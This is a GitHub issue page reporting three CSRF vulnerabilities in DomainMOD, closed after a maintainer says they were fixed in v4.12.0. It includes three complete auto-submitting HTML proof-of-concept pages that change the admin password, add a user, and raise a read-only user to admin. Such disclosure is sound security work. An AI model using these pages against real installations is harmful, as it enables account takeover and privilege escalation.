Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are three CSRF vulnerability that can add the administrator account or change the read-only user to admin or change admin password #65

Closed
anquanquantao opened this issue May 29, 2018 · 1 comment

Comments

@anquanquantao
Copy link

commented May 29, 2018

After the administrator logged in, open the following three page.

change password:
cp.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_password' value='hack1234' />";
fields += "<input type='hidden' name='new_password_confirmation' value='hack1234' />";  

var url = "https://demo.domainmod.org/settings/password/";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

add the administrator account
add a read-only user
aru.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_first_name' value='hack1234' />";
fields += "<input type='hidden' name='new_last_name' value='hack1234' />";  
fields += "<input type='hidden' name='new_username' value='hack1234' />";
fields += "<input type='hidden' name='new_email_address' value='hack@hack.com' />";  

var url = "https://demo.domainmod.org/admin/users/add.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

change the read-only user to admin
crta.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_first_name' value='hack1234' />";
fields += "<input type='hidden' name='new_last_name' value='hack1234' />";  
fields += "<input type='hidden' name='new_username' value='hack1234' />";
fields += "<input type='hidden' name='new_email_address' value='hack@hack.com' />";  
fields += "<input type='hidden' name='new_currency' value='USD' />";
fields += "<input type='hidden' name='new_timezone' value='Canada/Pacific' />";  
fields += "<input type='hidden' name='new_expiration_emails' value='1' />";
fields += "<input type='hidden' name='new_is_admin' value='1' />";
fields += "<input type='hidden' name='new_read_only' value='0' />";
fields += "<input type='hidden' name='new_is_active' value='1' />";  
fields += "<input type='hidden' name='original_username' value='hack1234' />";
fields += "<input type='hidden' name='new_uid' value='2' />";

var url = "https://demo.domainmod.org/admin/users/edit.php?uid=2";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

@anquanquantao anquanquantao changed the title There is three CSRF vulnerability that can add the administrator account or change the read-only user to admin or change admin password There are three CSRF vulnerability that can add the administrator account or change the read-only user to admin or change admin password May 29, 2018

@chetcuti chetcuti self-assigned this Aug 31, 2018

@chetcuti

This comment has been minimized.

Copy link
Member

commented Feb 3, 2019

This was fixed in v4.12.0, which was released earlier today.

Thanks for the report!

@chetcuti chetcuti closed this Feb 3, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.